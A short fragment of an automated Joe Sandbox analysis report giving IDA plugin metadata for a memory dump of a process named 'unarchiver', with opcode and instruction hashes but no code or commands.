                                                          • Source File: 00000015.00000002.2151249138.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_1640000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfbc79f28fdf607221c044efcd5cd9c59cd5c32415a6ad327533d0788aa08ea3
                                                          • Instruction ID: 4d58f734a3d034604150af7ffa8ec37646219e01701b92146092636ebf5c504c
                                                          • Opcode Fuzzy Hash: cfbc79f28fdf607221c044efcd5cd9c59cd5c32415a6ad327533d0788aa08ea3
                                                          • Instruction Fuzzy Hash: BEC012302003148FC714AB68DD18A6977966BD8604F89C0689A081B761DB74EC51C684